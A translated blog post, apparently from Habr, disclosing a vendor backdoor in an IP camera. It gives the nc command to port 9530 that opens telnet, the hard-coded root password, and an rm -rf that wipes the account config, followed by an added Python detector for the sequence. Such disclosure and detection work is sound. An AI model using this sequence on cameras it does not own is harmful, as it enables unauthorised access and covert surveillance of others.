
You are a big brother, or try yourself as an all-seeing eye.



Fairy Tale

A master bought a reliable door: cast iron, with locks offering a gazillion combinations. But after installation the steel hinges creaked. He called in a specialist and sat in his kitchen sipping tea while he waited. Suddenly the installer walks up to him and says in a human voice: "The job is done. The hinges are greased, go and check." The master asks him: "How did you get in through the door, the iron one, certified all over, left and right?" The workman answers: "So as not to wait at the threshold for you to come and open it, master, we certified specialists decided to build in a secret button with our own hands: knock on the upper left corner of the door and it will open."
Lies, you will think, such things happen only in fairy tales. And you will be fundamentally wrong.

In this post I will prove convincingly, and with examples, that such developers exist.

An IP camera from a country famous for the unique quality of the equipment it produces somehow ended up in my hands, with an unknown password. Googling how to reset the settings led me to a utility that resets this password, but what interested me was the way in which it does it.

This is what was originally discovered on the camera:
Host is up (0.0014s latency).
Not shown: 65529 closed ports
PORT      STATE SERVICE
80/tcp    open  http
554/tcp   open  rtsp
8899/tcp  open  ospf-lite
9527/tcp  open  unknown
9530/tcp  open  unknown
34567/tcp open  unknown

The web interface is password protected. There is no CLI.

We start tcpdump, then start the password reset utility.
We see that the command \rOpenTelnet:OpenOnce is sent to port 9530/tcp. After that, telnet opens on the device, and the program connects to port 23 and, using pre-installed passwords, resets the password part of the configuration.



Let's try to do everything manually.
1. Open telnet on the camera:
nc 192.168.1.10 9530
\rOpenTelnet:OpenOnce

Check that it is open:
nmap -p 1-65535 192.168.1.10

PORT      STATE SERVICE
23/tcp    open  telnet
80/tcp    open  http
554/tcp   open  rtsp
8899/tcp  open  ospf-lite
9527/tcp  open  unknown
9530/tcp  open  unknown
34567/tcp open  unknown

We log in with the standard password:
telnet 192.168.1.10
Trying 192.168.1.10 ...
Connected to 192.168.1.10.
Escape character is '^]'.
LocalHost login: root
Password: xmhdipc
Welcome to Monitor Tech.
# rm -rf /mnt/mtd/Config/Account*
# reboot
# Connection closed by foreign host.

After rebooting, the camera is available via the web without a password. Enjoy.
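
The sequence above, a command sent to 9530/tcp followed by a telnet login to the same device, can be watched for on the defender's side. The following is an added example, not part of the original post: the Flow record layout, the 120-second window and the alert names are assumptions, and the sample flows are constructed.

```python
from dataclasses import dataclass

TRIGGER_PORT = 9530            # port the reset utility talks to (from the post)
TRIGGER_MARK = b"OpenTelnet"   # marker in the captured command (from the post)
TELNET_PORT = 23


@dataclass(frozen=True)
class Flow:
    """One observed TCP flow (hypothetical record layout)."""
    ts: float          # seconds since capture start
    src: str
    dst: str
    dport: int
    payload: bytes = b""


def detect_telnet_enable(flows, window=120.0):
    """Alert on the enable command sent to TRIGGER_PORT, and on any telnet
    connection to the same device within `window` seconds after it."""
    alerts = []
    armed = {}  # device IP -> timestamp of the last enable command seen
    for f in sorted(flows, key=lambda f: f.ts):
        if f.dport == TRIGGER_PORT and TRIGGER_MARK in f.payload:
            armed[f.dst] = f.ts
            alerts.append(("telnet-enable-command", f.src, f.dst, f.ts))
        elif f.dport == TELNET_PORT and f.dst in armed:
            if f.ts - armed[f.dst] <= window:
                alerts.append(("telnet-login-after-enable", f.src, f.dst, f.ts))
    return alerts


# Constructed sample capture, not real traffic.
SAMPLE = [
    Flow(0.0, "192.168.1.50", "192.168.1.10", 80, b"GET / HTTP/1.1\r\n"),
    Flow(5.2, "192.168.1.50", "192.168.1.10", 9530, b"\rOpenTelnet:OpenOnce"),
    Flow(9.8, "192.168.1.50", "192.168.1.10", 23),
    Flow(11.0, "192.168.1.50", "192.168.1.11", 23),    # other device, never armed
    Flow(400.0, "192.168.1.51", "192.168.1.10", 23),   # outside the window
    Flow(410.0, "192.168.1.50", "192.168.1.10", 9530, b"hello"),  # no marker
]

if __name__ == "__main__":
    for alert in detect_telnet_enable(SAMPLE):
        print(alert)
```

On a real network the flows would come from a capture or an IDS export. Filtering 9530/tcp and 23/tcp towards the camera segment closes the path regardless of what the firmware does.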

What guides the equipment manufacturer when it leaves such holes is, to me personally, not clear.

Dear readers, never scan a city network that you would like to watch for open port 9530, and do not perform the actions described above: this may lead to the desire to go on vacation or go on a trip.

Source: https://habr.com/ru/post/332526/

